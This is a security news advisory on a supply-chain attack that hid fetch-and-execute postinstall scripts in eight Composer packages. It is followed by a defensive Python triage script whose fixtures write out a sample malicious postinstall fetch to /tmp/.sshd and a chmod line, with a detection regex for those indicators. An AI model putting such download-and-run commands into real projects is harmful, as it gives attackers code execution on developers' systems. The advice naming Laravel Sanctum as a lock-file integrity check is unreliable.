A new coordinated supply‑chain attack has struck the Packagist ecosystem, infecting eight popular Composer packages with malware that fetches and executes a Linux binary hosted on GitHub Releases.

What happened

According to research shared by Ravie Lakshmanan on The Hacker News (May 23 2026), the attackers modified the package.json files (not composer.json) of the following packages to include a malicious postinstall script:

  • moritz-sauer-13/silverstripe-cms-theme (dev-master)
  • crosiersource/crosierlib-base (dev-master)
  • devdojo/wave (dev-main)
  • devdojo/genesis (dev-main)
  • katanaui/katana (dev-main)
  • elitedevsquad/sidecar-laravel (3.x-dev)
  • r2luna/brain (dev-main)
  • baskarcm/tzi-chat-ui (dev-main)

When a developer runs composer install or composer update, the compromised package.json triggers a script that:

  1. Downloads a Linux binary from a GitHub Releases URL (github.com/parikhpreyash4/systemd-network-helper-aa5c751f).
  2. Saves the binary to /tmp/.sshd.
  3. Changes its permissions with chmod +x to make it executable.
  4. Executes the binary in the background.

Additional infection vector

The same malicious payload was also found inserted into GitHub Actions workflow files (*.yml/.yaml) within the compromised repositories, allowing the malware to run during CI/CD pipelines.

Impact & recommendations

  • Remote Code Execution (RCE): The downloaded binary grants attackers arbitrary code execution on any system that installs the compromised package.
  • Persistence & evasion: The malware disables TLS verification and suppresses errors to hide its network activity.
  • Wider campaign: Socket’s analysis found references to the same payload across 777 files on GitHub, suggesting a broader distribution effort.

Immediate actions for developers

  1. Audit dependencies: Check if any of the listed packages (or their forks) appear in your composer.lock.
  2. Remove compromised versions: Immediately upgrade to clean versions or remove the packages until a safe release is available.
  3. Monitor CI/CD logs: Look for unexpected executions from /tmp/.sshd or unfamiliar GitHub Actions steps.
  4. Use lock‑file verification: Enable integrity checks (e.g., Laravel Sanctum, Composer audit plugins) to detect unexpected changes.
  5. Consider vendor‑pinning: For critical packages, vendor the source or use a private mirror with strict access controls.
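As an added example that is not part of the article or Socket's report, the following Python triage script applies steps 1 and 3 above to a repository checkout: it flags composer.lock entries for the listed packages, lifecycle scripts in package.json that reference the indicators quoted in this article, and workflow lines that do the same. The sample lock file, package.json and workflow are constructed for illustration.

```python
import json
import re

# Package names from the advisory (vendor/name). Only the listed dev branches were
# reported as affected, but any lock entry for these names deserves a manual review.
COMPROMISED = {
    "moritz-sauer-13/silverstripe-cms-theme", "crosiersource/crosierlib-base",
    "devdojo/wave", "devdojo/genesis", "katanaui/katana",
    "elitedevsquad/sidecar-laravel", "r2luna/brain", "baskarcm/tzi-chat-ui",
}

# Indicators quoted in the article: the GitHub Releases repository and the drop path.
INDICATORS = re.compile(r"parikhpreyash4/systemd-network-helper|/tmp/\.sshd", re.I)


def lock_hits(lock_text: str) -> list:
    """Return (name, version) for every composer.lock entry that names a listed package."""
    data = json.loads(lock_text)
    hits = []
    for section in ("packages", "packages-dev"):
        for pkg in data.get(section, []):
            if pkg.get("name", "").lower() in COMPROMISED:
                hits.append((pkg["name"], pkg.get("version", "?")))
    return hits


def suspicious_scripts(package_json_text: str) -> list:
    """Return (script_name, command) for package.json scripts containing an indicator."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return [(name, cmd) for name, cmd in scripts.items() if INDICATORS.search(cmd)]


def indicator_lines(text: str) -> list:
    """Return 1-based line numbers of a workflow (or any text file) that contain an indicator."""
    return [i for i, line in enumerate(text.splitlines(), 1) if INDICATORS.search(line)]


# Constructed samples (not real project files) so the script runs offline.
SAMPLE_LOCK = json.dumps({
    "packages": [{"name": "devdojo/wave", "version": "dev-main"},
                 {"name": "laravel/framework", "version": "v11.0.0"}],
    "packages-dev": [],
})
SAMPLE_PKG = json.dumps({"scripts": {
    "build": "vite build",
    "postinstall": "sh -c 'fetch github.com/parikhpreyash4/systemd-network-helper-aa5c751f > /tmp/.sshd'",
}})
SAMPLE_WORKFLOW = "name: ci\non: push\njobs:\n  build:\n    runs-on: ubuntu-latest\n" \
                  "    steps:\n      - uses: actions/checkout@v4\n      - run: composer install\n" \
                  "      - run: chmod +x /tmp/.sshd\n"

if __name__ == "__main__":
    print("lock:", lock_hits(SAMPLE_LOCK))
    print("scripts:", suspicious_scripts(SAMPLE_PKG))
    print("workflow lines:", indicator_lines(SAMPLE_WORKFLOW))
```

Point the three functions at real composer.lock, package.json and .github/workflows/*.yml contents to triage a checkout; a hit is a reason to inspect the file, not proof of compromise on its own.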

Ongoing investigation

The exact purpose of the downloaded binary (gvfsd-network) remains unclear, as the associated GitHub account is no longer available. Security researchers advise treating any system that has executed the binary as compromised until proven otherwise.

Note: This article is based on publicly available information from The Hacker News and Socket’s threat‑intelligence report. Details may evolve as the investigation continues.


Tags: cybersecurity, supply-chain, packagist, malware, github